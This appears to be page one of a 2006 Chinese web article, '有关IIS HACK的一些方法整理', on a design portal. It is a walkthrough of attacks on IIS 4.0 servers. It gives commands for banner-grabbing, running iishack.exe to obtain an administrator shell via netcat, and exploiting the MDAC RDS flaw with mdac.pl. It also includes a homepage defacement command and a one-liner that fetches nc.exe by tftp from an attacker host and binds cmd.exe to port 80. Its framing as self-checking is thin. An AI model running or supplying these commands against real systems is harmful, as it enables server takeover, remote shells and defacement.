会员名称：  密码：  不 保 存 保存一天 保存一周 保存一月 保存一年   验证码：     会员注册  忘记密码？  ■ 设为首页 ■ 加入收藏 ■ 返回首页

媒体资讯>> 业界资讯 - 会展动态 - 竞赛&活动 - IT互联网  媒体学院>> 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用  作品赏析>> 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计  媒体工作室>> 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象  人物访谈>> 人物访谈 - 华夏新锐  媒体杂志>> 媒体杂志  素材图库>> 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标  酷站赏析>> 韩国网站 - 国外网站 - 国内网站  会员中心>> 会员注册 - 会员登陆

会员服务区：我的主页 | 我的信箱 | 我的作品 | 我的文章 | 我的工作室 | 我的网摘 | 华夏媒体首页   Media86快速通道↓ === 媒体资讯 === - 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用 === 作品赏析 === - 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计 === 媒体工作室 === - 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象 === 人物访谈 === - 人物访谈 - Media86新锐 === 媒体杂志 === - 媒体杂志 === 素材图库 === - 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标 === 网站截图 === - 韩国网站 - 国外网站 - 国内网站 === 会员中心 === - 会员注册 - 会员登陆

当前位置：华夏媒体 - > 媒体学院 - > 网络应用 - > 其它综合 - > 有关IIS HACK的一些方法整理

媒体资讯 作品赏析 工 作 室 人物访谈 软件源码 素材图库 网站截图       有关IIS HACK的...  [其它...] More...      网络协议X档案...  [其它...] 不可忽视的BIO...  [其它...] 微软IE浏览器非...  [其它...] 微软IE浏览器非...  [其它...] 网管十招  [其它...] 微软安全问题 ...  [其它...] 修改注册表使电...  [其它...] 利用注册表管理...  [其它...] 有关IIS HACK的...  [其它...] More

有关IIS HACK的一些方法整理 编辑：华夏媒体     作者：未知     来源：网络     时间：2006-07-29     总浏览量：2108 文字大小：[ 大  中  小 ]     文字颜色： 文本颜色 Black Red Yellow Pink Green Orange Purple Blue Beige Brown Teal Navy Maroon LimeGreen       双击滚屏/单击停止 [上一页] [1] [2] [3] [4] [下一页]  1，介绍 由于这些方法针对通过端口80来操作，所以具有一定的威胁性，因为作为WEB你这个口总要开的。如果你想一边抽烟一边查漏洞，OK，你下载一些CGI扫描器来帮助你检查，你可以尝试使用这两个： "whisker" by "rain forest puppy" (www.wiretrip.net/rfp). "cis" by "mnemonix" (www.cerberus-infosec.co.uk) 另外你如果要知道目标机器运行的是啥类型的服务程序，你可以使用下面的命令： telnet <victim> 80 GET HEAD / HTTP/1.0 就可以返回一些名字和WEB服务程序版本，如果有些服务器把WEB运行在8080，81，8000，8001口，你就TELNET相应的口上。 如果你要知道运行了SSL的WEB服务程序，在WEB服务器和浏览器进行了连接的的话，我们就可以使用工具"ssleay": s_client -connect <victim>:443 HEAD / HTTP /1.0 2,一些常用方法： ========IIS HACK========== www.eeye.com的人员发现了一个IIS4.0的缓冲溢出可以允许用户上载程序，如netcat到目标服务器，并把cmd.exe绑定到80口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中，其对关于这些文件的URL请求 没有对名字进行充分的边界检查，导致运行攻击者插入一些后门程序在系统中下载和执行程序。 要检测这样的站点你需要两个文件iishack.exe，ncx.exe，你可以到下面的站点www.technotronic.com去下载，另外你还需要一台自己的WEB服务器，当然你可以是虚拟服务器哦。 你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下，然后使用iishack.exe来检查目标机器： c:\>iishack.exe <victim> 80 <your web server>/ncx.exe 然后你就使用netcat来连接你要检测的服务器： c:\>nc <victim> 80  如果溢出点正确你就可以看到目标机器的命令行提示，并且是管理远权限。 =========MDAC- 本地命令执行=========== 你可能认为这个漏洞太老了，可网络如此之大，可能还有好多IIS WEB服务器存在这个漏洞啦。IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory，默认情况下，它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，其一般默认情况下是SYSTEM用户。关于这个漏洞的描述，很多文章介绍的很清楚，这里不做详细解释，你如果要对自己的站点进行检查是否存在这个漏洞，你可以通过下面的操作： c:\>nc -nw -w 2 <victim> 80 GET /msadc/msadcs.dll HTTP 如果你得到下面的信息： application/x_varg 就很有可能没有打上补丁并存在此漏洞，你可以使用rain forest puppy站上的两个程序进行测试(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl 。 c:\> mdac.pl -h <victim> Please type the NT commandline you want to run (cmd /c  assumed):\n cmd /c OK，如果你要替换对方的主页，你就可以使用下面的方法： cmd/c echo hacked by me >  d:\inetpub\wwwroot\victimweb\index.htm 或者其他命令，当然最好的方法我觉得还是使用上载我们的netcat，并把CMD.EXE绑定到端口80上，我们可以设置我们自己的TFTP服务程序并把nc.exe放上去，然后在执行命令，如： cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET  nc.exe&&del ftptmp && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe 然后你就连接到80口，得到一个SHELL口让你浏览。呵呵！ =========Codebrws.asp & Showcode.asp ================== Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序，但不是默认安装的，这个查看器是如果管理员允许查看样例文件作为联系而安装的，但是，这个查看器没有很好的限制所访问的文件，远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容，但要注意以下几点： 1，Codebrws.asp 和 Showcode.asp默认情况下没有安装。 2，漏洞仅允许查看文件内容。 3，这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。 4，只有同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装 是个不错的注意，也可能比较好的防止最新的IIS5.0的unicode漏洞). 5,攻击者需要知道请求的文件名。 [上一页] [1] [2] [3] [4] [下一页]  打印   收藏   关闭   至顶部

关于我们 | 联系我们 | 合作伙伴 | 站点地图 | 免责声明 | 版权声明 | 意见建议 版权所有  Copyright © 2005-2006 华夏媒体(Media86.Com). All Rights Reserved . 网站备案号：粤ICP备06055307号